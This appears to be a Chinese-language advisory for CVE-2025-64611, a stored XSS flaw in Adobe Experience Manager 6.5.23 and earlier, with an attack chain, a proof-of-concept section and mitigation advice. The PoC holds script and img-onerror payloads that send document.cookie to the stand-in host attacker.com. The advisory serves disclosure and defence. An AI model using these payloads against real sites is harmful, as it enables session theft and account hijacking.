CVE-2025-64611 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64611

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64611是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞，影响版本6.5.23及更早版本。该漏洞允许低权限攻击者在表单字段中注入恶意脚本，当受害者浏览包含该漏洞字段的页面时，恶意JavaScript代码会在其浏览器中执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意内容。由于是存储型XSS，恶意脚本会持久存在于服务器端，影响所有访问该页面的用户。此漏洞的CVSS评分为5.4，属于中等严重程度，需要用户交互才能触发，攻击复杂度较低但需要低权限认证。

技术细节

Adobe Experience Manager 6.5.23及更早版本中的表单处理模块存在输入验证不足的漏洞。攻击者以低权限用户身份登录系统后，可在表单输入字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）。由于系统未对用户输入进行充分的输出编码和过滤，该恶意脚本会被永久存储在服务器端数据库中。当其他用户访问包含该表单字段的页面时，存储的恶意代码会随页面内容一同返回并在用户浏览器中执行。攻击者可以利用此漏洞窃取受害者的会话令牌、获取敏感信息或执行其他恶意操作。此漏洞的利用条件包括：攻击者需拥有低权限账户、需诱使受害者访问恶意页面、目标用户需处于登录状态。防御此类漏洞需要在用户输入端进行严格的内容过滤，并在输出端对所有动态内容进行HTML实体编码。

攻击链分析

STEP 1

步骤1

攻击者获取Adobe Experience Manager的低权限账户（如普通用户或内容编辑者权限）

STEP 2

步骤2

攻击者识别存在漏洞的表单字段，通常位于用户提交内容或评论区域

STEP 3

步骤3

攻击者在表单字段中注入恶意JavaScript代码（如<script>标签或事件处理器）

STEP 4

步骤4

恶意脚本被存储在服务器数据库中，由于是存储型XSS，脚本会持久存在

STEP 5

步骤5

攻击者通过社会工程学手段诱使受害者访问包含恶意脚本的页面

STEP 6

步骤6

受害者的浏览器解析页面时执行恶意脚本，攻击者借此窃取会话cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64611 Stored XSS PoC for Adobe Experience Manager -->
<!-- This PoC demonstrates injecting malicious JavaScript into form fields -->

<!-- Step 1: Identify vulnerable form field -->
<!-- Target URL: https://vulnerable-site/content/forms/af/example-form.html -->

<!-- Step 2: Inject XSS payload into form field -->
<!-- Example payload for form field injection -->
<script>
  // Steal session cookies
  var cookies = document.cookie;
  
  // Send stolen data to attacker-controlled server
  fetch('https://attacker.com/steal?c=' + encodeURIComponent(cookies), {
    method: 'GET',
    mode: 'no-cors'
  });
  
  // Alternative payload: Display alert with vulnerability info
  alert('XSS Vulnerability - CVE-2025-64611');
  console.log('Stolen cookies: ' + cookies);
</script>

<!-- Alternative payload using img tag for cookie theft -->
<img src=x onerror="this.src='https://attacker.com/log?c='+document.cookie">

<!-- Step 3: Social engineering - trick victim to visit the page -->
<!-- When victim visits the page, the stored script executes automatically -->

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager 6.5.x所有版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 禁用或限制低权限用户创建和编辑表单的能力；2) 对所有表单输入实施严格的输入验证，拒绝包含HTML标签和JavaScript代码的输入；3) 启用Content Security Policy (CSP)响应头，限制内联脚本执行；4) 对现有内容进行全面排查，清理可能存在的恶意脚本；5) 加强用户权限管理，遵循最小权限原则；6) 监控异常的用户行为和表单提交模式。